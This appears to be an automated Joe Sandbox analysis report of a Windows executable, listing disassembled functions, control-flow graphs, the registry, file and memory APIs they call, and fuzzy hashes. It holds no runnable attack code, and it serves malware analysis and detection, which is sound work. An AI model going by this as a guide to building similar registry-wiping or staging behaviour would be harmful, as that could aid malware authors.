                                                          control_flow_graph 728 402b7a-402ba3 RegOpenKeyExW 729 402ba5-402bb0 728->729 730 402c0e-402c12 728->730 731 402bcb-402bdb RegEnumKeyW 729->731 732 402bb2-402bb5 731->732 733 402bdd-402bef RegCloseKey call 4062b2 731->733 735 402c02-402c05 RegCloseKey 732->735 736 402bb7-402bc9 call 402b7a 732->736 740 402bf1-402c00 733->740 741 402c15-402c1b 733->741 738 402c0b-402c0d 735->738 736->731 736->733 738->730 740->730 741->738 743 402c1d-402c2b RegDeleteKeyW 741->743 743->738 745 402c2d 743->745 745->730
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?), ref: 00402B9B
                                                          • RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 00402BD7
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402BE0
                                                          • RegCloseKey.ADVAPI32(?), ref: 00402C05
                                                          • RegDeleteKeyW.ADVAPI32(?,?), ref: 00402C23
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Close$DeleteEnumOpen
                                                          • String ID:
                                                          • API String ID: 1912718029-0
                                                          • Opcode ID: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                          • Instruction ID: 39c85bfe7ca74ada2351cc0a51ccebcd1f3e21716521df4e7e96f28c7df0de5f
                                                          • Opcode Fuzzy Hash: b547f4a97addcc1e8c82d95905b84b8973278d2723117ef79469a300e8f1f4e9
                                                          • Instruction Fuzzy Hash: 5B116A31904008FEEF229F90DE89EAE3B7DFB14348F100476FA01B00A0D3B59E51EA69
                                                          Function 10001759 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 118COMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 746 10001759-10001795 call 10001b18 750 100018a6-100018a8 746->750 751 1000179b-1000179f 746->751 752 100017a1-100017a7 call 10002286 751->752 753 100017a8-100017b5 call 100022d0 751->753 752->753 758 100017e5-100017ec 753->758 759 100017b7-100017bc 753->759 760 1000180c-10001810 758->760 761 100017ee-1000180a call 100024a9 call 100015b4 call 10001272 GlobalFree 758->761 762 100017d7-100017da 759->762 763 100017be-100017bf 759->763 767 10001812-1000184c call 100015b4 call 100024a9 760->767 768 1000184e-10001854 call 100024a9 760->768 784 10001855-10001859 761->784 762->758 769 100017dc-100017dd call 10002b5f 762->769 765 100017c1-100017c2 763->765 766 100017c7-100017c8 call 100028a4 763->766 772 100017c4-100017c5 765->772 773 100017cf-100017d5 call 10002645 765->773 779 100017cd 766->779 767->784 768->784 782 100017e2 769->782 772->758 772->766 783 100017e4 773->783 779->782 782->783 783->758 788 10001896-1000189d 784->788 789 1000185b-10001869 call 1000246c 784->789 788->750 794 1000189f-100018a0 GlobalFree 788->794 796 10001881-10001888 789->796 797 1000186b-1000186e 789->797 794->750 796->788 799 1000188a-10001895 call 1000153d 796->799 797->796 798 10001870-10001878 797->798 798->796 800 1000187a-1000187b FreeLibrary 798->800 799->788 800->796
                                                          APIs
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D83
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D88
                                                            • Part of subcall function 10001B18: GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001804
                                                          • FreeLibrary.KERNEL32(?), ref: 1000187B
                                                          • GlobalFree.KERNEL32(00000000), ref: 100018A0
                                                            • Part of subcall function 10002286: GlobalAlloc.KERNEL32(00000040,00001020), ref: 100022B8
                                                            • Part of subcall function 10002645: GlobalAlloc.KERNEL32(00000040,?,?,?,00000000,?,?,?,?,100017D5,00000000), ref: 100026B7
                                                            • Part of subcall function 100015B4: lstrcpyW.KERNEL32(00000000,10004020,00000000,10001731,00000000), ref: 100015CD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1450882220.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1450819707.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450905732.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1450962462.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc$Librarylstrcpy
                                                          • String ID:
                                                          • API String ID: 1791698881-3916222277
                                                          • Opcode ID: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                          • Instruction ID: d353a68b508970880cf9150dbe01e0f77130c4103e9cfdf2e47557ee24e57a3c
                                                          • Opcode Fuzzy Hash: d19b98991503ed1f4222ee02892706a0c20354a75bd4722b3fc13797bb1a772f
                                                          • Instruction Fuzzy Hash: 5E31BF75804241AAFB14DF749CC9BDA37E8FF053D0F158065FA0A9A08FDF74A9848761
                                                          Function 00405E15 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 45registryCOMMON
                                                          Download Yara Rule

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 803 405e15-405e47 RegOpenKeyExW 804 405e89-405e8c 803->804 805 405e49-405e68 RegQueryValueExW 803->805 806 405e76 805->806 807 405e6a-405e6e 805->807 809 405e79-405e83 RegCloseKey 806->809 808 405e70-405e74 807->808 807->809 808->806 808->809 809->804
                                                          APIs
                                                          • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,Call,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E3F
                                                          • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E60
                                                          • RegCloseKey.ADVAPI32(?,?,00406088,80000002,Software\Microsoft\Windows\CurrentVersion,?,Call,?), ref: 00405E83
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CloseOpenQueryValue
                                                          • String ID: Call
                                                          • API String ID: 3677997916-1824292864
                                                          • Opcode ID: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                          • Instruction ID: 600534e839ec184522a2ed62e812a695e1e378dc1a2fe7ff70d8343822b3fb0e
                                                          • Opcode Fuzzy Hash: 6d49e1ec12a7b24cc87819d5cf70687d25a5c21dfc25d1df192b84af38ef9460
                                                          • Instruction Fuzzy Hash: A7015A3114020EEACB218F56EC08EEB3BA8EF54390F00413AF944D2220D334DA64CBE5
                                                          Function 00405BE3 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 37COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00405C01
                                                          • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,00403358,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405C1C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: CountFileNameTempTick
                                                          • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                          • API String ID: 1716503409-386316673
                                                          • Opcode ID: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction ID: 094b443934c56d738417ad06ce23117a41e39d67b54f0ae1535361756efc6c0b
                                                          • Opcode Fuzzy Hash: c429582aea5e4f3fae6c397ed87dacf02ee6c580567254a7da4e12ab8597e880
                                                          • Instruction Fuzzy Hash: 45F09676A04208BBDB009F59DC05E9BB7B8EB91710F10803AEA01E7151E2B0AD448B54
                                                          Function 00403326 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 20COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 0040623F
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,?,?,00000000), ref: 0040624E
                                                            • Part of subcall function 004061DC: CharNextW.USER32(?,"C:\Users\user\Desktop\fTSt7dc60O.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 00406253
                                                            • Part of subcall function 004061DC: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403332,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 00406266
                                                          • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,774D3420,00403542), ref: 00403347
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$CreateDirectoryPrev
                                                          • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 4115351271-2916873424
                                                          • Opcode ID: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                          • Instruction ID: 64a45b222adfb8bd76fd8b495f2d7cf88aee328212c381153bc1e0c9699f7593
                                                          • Opcode Fuzzy Hash: bbd1dcb3637595afbe6b96ae3bcfafd58112e7b3325432cb54e87bfcccc6df60
                                                          • Instruction Fuzzy Hash: 22D0C92251AA3135C551372A7D06FCF295C8F0A329F12A477F809B90C2CB7C2A8249FE
                                                          Function 004069D2 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction ID: dca007468fed7c27dd914b546e5ea1ac9ab056a0c62ecf1bea7b7831388965f7
                                                          • Opcode Fuzzy Hash: ba6317b19b7b230722eb11252d44c293277e5dc1cbca2e551617393c5194c9d0
                                                          • Instruction Fuzzy Hash: 58A14471E00229DBDF28CFA8C8447ADBBB1FF48305F15816AD856BB281C7785A96CF44
                                                          Function 00406BD3 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction ID: e31ab10654d3133c4bbe562e0396aaf9f668a3464ceaf5ac7e335a669e1e1d03
                                                          • Opcode Fuzzy Hash: db87408b1e9cadcd0a4c6ae5b6f4dd47f3337075cb2a4d2d14f0ff51d5c97f6a
                                                          • Instruction Fuzzy Hash: 8E912371E00228CBEF28CF98C8587ADBBB1FF44305F15816AD856BB291C7785A96DF44
                                                          Function 004068E9 Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction ID: e0c60a541a5106e25e0a2f50f35f038ee2aa27f15edb78bccdd8f3c871378321
                                                          • Opcode Fuzzy Hash: 165f4b65d4ff5263617aa106d744e60dbd7c4f5d43725cc52d5e79b0d4499ef2
                                                          • Instruction Fuzzy Hash: 2C814471D04228DFDF24CFA8C8487ADBBB1FB45305F25816AD456BB281C7789A96CF44
                                                          Function 004063EE Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction ID: c1f18cc480c27d0a28c5d6dc1e8cd9b1e5e62e2ab7f78041d4dc85e199002e6a
                                                          • Opcode Fuzzy Hash: 148eda801716ed3d9969b88488a2fa3c6a7092fa608051ce9148cc038319d1b3
                                                          • Instruction Fuzzy Hash: 9B816731D04228DBDF24CFA8C8487ADBBB1FB44305F25816AD856BB2C1C7785A96DF84
                                                          Function 0040683C Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction ID: 317a4f11872e46a6f39a96627fb546a7164eb21cb9e645d400dda74b69288846
                                                          • Opcode Fuzzy Hash: 4983b507bd6312ae2b30a384a7c44b2e85aa51a10719cb6f4e73ba4d3199020d
                                                          • Instruction Fuzzy Hash: 48713471D04228DFEF24CFA8C8447ADBBB1FB48305F15816AD856BB281C7785A96DF44
                                                          Function 0040695A Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction ID: 7b464a411068ed62169f7738ff9b09ef3af2f2625e32a791141ed05019b82bd1
                                                          • Opcode Fuzzy Hash: 02494a79b55f78bffb2877069ace75a440f4ea31aa61c09e76d6a1b36594b02c
                                                          • Instruction Fuzzy Hash: A4714571E04228DFEF28CF98C8447ADBBB1FB48301F15816AD456BB281C7785996DF44
                                                          Function 004068A6 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430807224.000000000044A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_fTSt7dc60O.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction ID: 924b227091e8338000478ad755e115b80dfeef44851b3a3b0f99ac33e872c674
                                                          • Opcode Fuzzy Hash: e250f200d648af3f0bd61970bfe314c861a6b6aa0b25ddc882d3b39d553e7667
                                                          • Instruction Fuzzy Hash: 07713571E04228DBEF28CF98C8447ADBBB1FF44305F15816AD856BB281C7785A96DF44
                                                          Function 00403062 Relevance: 4.6, APIs: 3, Instructions: 95fileCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00409230,00000000,00000000,00000000,00000000,?,?,?,0040300E,000000FF,00000000,00000000,00409230,?), ref: 00403088
                                                          • WriteFile.KERNELBASE(00000000,00413E90,?,000000FF,00000000,00413E90,00004000,00409230,00409230,00000004,00000004,00000000,00000000,?,?), ref: 00403115
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1430700519.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1430688357.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430713752.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000426000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1430725989.0000000000446000.00000004.00000001.01000000.00000003.sdmpDownload File
